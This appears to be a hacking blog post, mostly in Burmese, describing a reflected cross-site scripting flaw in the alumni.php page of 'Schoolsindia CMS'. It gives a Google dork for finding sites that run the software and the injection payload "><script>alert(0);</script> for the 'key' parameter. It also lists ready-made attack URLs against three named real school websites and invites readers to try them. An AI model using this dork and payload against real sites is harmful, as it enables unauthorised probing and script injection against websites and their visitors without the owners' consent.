Schoolsindia CMS Cross Site Scripting

Google Dork: Intext:"Powered by Schoolsindia"

အဓိက သိထား၇မွာက alumni.php ပါဘဲ.. website.com/alumni.php လုိဆုိဒ္ေတြ၇ွိပါတယ္..
ဒါလိုဆုိဒ္ေတြဆုိရင္ေတာ့ဒီနည္းေလး နဲ ့ နီးစပ္မွ၇ွိနုိင္တယ္ေလ.. စမ္းၾကည့္တာေပ့ါပာုတ္ဘူးလား။

alumni.php?id=&key=[htmlcode]&max=[number]&pageno=[number]

ဘာတန္းၾကီးလဲေတာ့မေျပာနဲ ့ေနာ္ ၇ွင္းျပေပးမယ္.. html code ဆုိတဲ့ေန၇ာမွာ script code  ေတြျဖစ္တဲ့ "><script>alert(0);</script> ကုိထည့္ပါ..

ၾကာပါတယ္ မ၇ွင္းမွာ
ဆုိးလို ့ဗ်ာ လင့္နဲ ့အေသအခ်ာ စမယ္

http://apsbeas.org/alumni.php?id=&amp;key="><script>alert(0);</script>&amp;max=10&amp;pageno=2

ဘဲဆုိပါေတာ့ဗ်ာ။ အဲ့လင့္ကိုၾကည့္လုိက္ပါ။ html code ေနရာမွာ.."><script>alert(0);</script> ကုိအစားသြင္းထားပါတယ္။ number ေနရာေတြမွာ 10 နဲ ့ 2 ကုိသြင္းထားပါတယ္။။

ဒါဆုိဆုိလုိခ်င္တာပါဘဲ..

ဒီေတာ့ စမ္းဖုိ ့ေအာက္ကလင့္ေလးေတြထပ္သြားၾကည့္ေပ့ါဗ်ာ..


http://apsbeas.org/alumni.php?id=&amp;key="><script>alert(0);</script>&amp;max=10&amp;pageno=2

http://dpsmbd.com/alumni.php?id=&amp;key="><script>alert(0);</script>&amp;max=10&amp;pageno=2

http://www.stmarysmbd.com/alumni.php?id=&amp;key="><script>alert(0);</script>&amp;max=10&amp;pageno=2

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com